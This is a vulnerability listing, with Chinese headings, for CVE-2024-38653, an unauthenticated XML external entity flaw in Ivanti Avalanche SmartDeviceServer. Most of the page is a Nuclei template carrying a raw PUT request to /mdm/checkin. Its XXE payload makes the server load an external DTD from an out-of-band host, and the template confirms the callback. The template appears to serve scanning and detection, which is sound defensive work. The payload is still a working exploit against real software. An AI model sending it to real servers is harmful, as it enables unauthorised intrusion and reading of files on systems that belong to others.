漏洞描述
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
CVE-2024-38653: Ivanti Avalanche SmartDeviceServer - XML External Entity
PoC代码[已公开]
id: CVE-2024-38653
info:
name: Ivanti Avalanche SmartDeviceServer - XML External Entity
author: DhiyaneshDK
severity: high
description: |
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
reference:
- https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/cve-2024-38653
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-38653
cwe-id: CWE-611
epss-score: 0.88688
epss-percentile: 0.99478
cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:*
metadata:
max-request: 1
vendor: ivanti
product: avalanche
tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
PUT /mdm/checkin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%asd;
%c;
]>
<a></a>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 490a0046304402207eb148a0760706bea8a4e8b2f62e9a0006b3df824f426d1963ceb8d13481aefa0220131e99668ed0460d2c014ea0fd8620069600db5a2cd6e14a4a788ad846eed461:922c64590222798bb761d5b6d8e72950